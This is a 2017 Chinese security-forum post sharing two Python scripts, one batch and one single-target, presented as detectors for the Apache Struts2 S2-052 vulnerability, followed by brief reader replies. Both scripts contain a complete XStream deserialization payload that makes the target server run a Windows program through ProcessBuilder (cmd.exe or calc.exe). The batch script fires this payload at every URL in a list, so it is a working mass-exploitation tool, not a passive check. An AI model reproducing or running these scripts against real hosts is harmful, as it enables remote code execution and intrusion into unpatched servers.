诚殷网络WEB安全技术论坛—WEB安全培训|渗透测试培训|网络安全培训|黑客论坛|白帽子论坛|黑客论坛|

[脚本工具] ST2-052批量检测与单个检测Py脚本工具

2017-9-6 17:13
8755
QQ图片20170906171230.png

批量测试
[Python] 纯文本查看 复制代码
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
#小二逼
import urllib, httplib


httpClient = None

url_list=[i.replace("\n","") for i in open("url.txt","r").readlines()]
for ip in url_list:
    i=0
    while i < len(url_list):
        i=i+1
        try:
            data =('<map><entry><jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>C:/Windows/System32/cmd.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>')
            headers = {'Content-type': 'application/xml'}
        
        
        	
            httpClient = httplib.HTTPConnection(ip, timeout=10)
            httpClient.request('POST', '/struts2-rest-showcase/orders/3', data, headers)
            response = httpClient.getresponse()
            body= response.read()
        
            if "java.util.HashMap" in body:
                print ip,"该url存在s2-052漏洞"
            else:
	            print ip,"不存在漏洞"
            break
        
        except Exception, e:
            print e
        finally:
            if httpClient:
                httpClient.close()

单个测试

[Python] 纯文本查看 复制代码
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
#小二逼
import urllib, httplib


httpClient = None
ip=raw_input("请输入ip+端口(格式:127.0.0.1:8000):")
try:
    data =('<map><entry><jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>C:/Windows/System32/calc.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>')
    headers = {'Content-type': 'application/xml'}
    httpClient = httplib.HTTPConnection(ip, timeout=10)
    httpClient.request('POST', '/struts2-rest-showcase/orders/3', data, headers)
    response = httpClient.getresponse()
except Exception, e:
    print e
finally:
    if httpClient:
        httpClient.close()



s2-052.zip

1.07 KB, 下载次数: 22

售价: 1 金钱  [记录]

单个检测

s2-052test.zip

1.19 KB, 下载次数: 20

售价: 1 金钱  [记录]

批量检测




上一篇:st2-052远程命令执行漏洞POC+复现测试
下一篇:(St2-053)_Apache Struts2 远程代码命令执行漏洞附POC
2 人收藏
诚殷网络专注WEB安全培训!

5 个回复 倒序浏览

ryuuku  新手白帽 | 2017-9-6 18:26:11
想看看可以不?
root  管理员 | 2017-9-6 19:09:16
ryuuku 发表于 2017-9-6 10:26
想看看可以不?

heartk  中级白帽 | 2017-9-7 11:22:09
不能看了???
catlee  新手白帽 | 2017-11-12 21:59:57
a374019371  新手白帽 | 3 天前
批量检查的打不开,打开就关了
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|手机版|小黑屋|诚殷网络论坛 ( 琼ICP备15002356号 )

Powered by Dede 123 © 2001-2016 Hacker.

返回顶部